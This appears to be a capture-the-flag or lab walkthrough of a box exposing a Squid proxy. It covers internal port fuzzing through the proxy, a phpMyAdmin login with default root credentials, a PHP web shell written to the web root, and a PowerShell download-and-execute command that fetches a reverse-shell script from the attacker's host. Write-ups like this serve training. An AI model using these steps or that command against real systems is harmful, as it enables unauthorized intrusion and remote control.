root💀haxor:~#

Try Harder!


First things first: we start by scanning the host for open ports with rustscan, then use nmap to enumerate the open ports further.

# Nmap 7.92 scan initiated Fri Jan 13 14:46:40 2023 as: nmap -sCV -A -p3128 -oN nmapscan -Pn 192.168.68.189
Nmap scan report for 192.168.68.189
Host is up (0.22s latency).

PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 13 14:47:16 2023 -- 1 IP address (1 host up) scanned in 36.55 seconds

From the scan result we see that it's a Linux box with only one port open, 3128, and the service running on it is Squid proxy.

Now, what is Squid proxy? Squid is a full-featured web proxy cache server application which provides proxy and cache services for Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and other popular network protocols.

Basically it's just a web proxy cache server application, and it sits as the link between external and internal services.

If we try accessing it directly we get an error page.

So we can leverage Squid to scan for internal ports that are open on the target.

First I need to generate a wordlist containing 1-65535 (the full TCP port range).

Then I fuzz for the internal ports, with the Squid proxy as the proxy that lets me perform this action.

From the result we see that two internal ports are listening: 3306 and 8080.

Using FoxyProxy we can access the internal web page, with the Squid IP and port set as the proxy.

Now, navigating to http://127.0.0.1:8080/, we are presented with the default WampServer page.

Looking further down the page we see a phpMyAdmin link; let's click on it.

Logging in with the default credentials root:<blank_password> gives us access to the phpMyAdmin panel.

We can leverage this to get remote code execution, as long as the database user has write access to the web root directory, which in this case is C:\wampp\www.

Then we create a PHP file that gives us code execution and save it in the web root directory.

Now, to get code execution, we just request the file and use ?cmd= to run the command.

And the web server is running as root.

Let's get a more stable shell.

I'll be using the Invoke-PowerShellTcp.ps1 script.

So I set up a Python HTTP server on port 80 and a netcat listener on port 4444.

Then, to get a shell, I'll use this PowerShell command, which downloads the external script and executes it, in this case the PowerShell reverse shell script:

powershell IEX(New-Object Net.WebClient).downloadString('http://<ip>:<port>/Invoke-PowerShellTcp.ps1')

Back on our Python HTTP server we see the script being requested.

And on our netcat listener we get a shell.

In case you have any problem with this, or I made a mistake, please be sure to DM me on Discord: Hack.You#9120
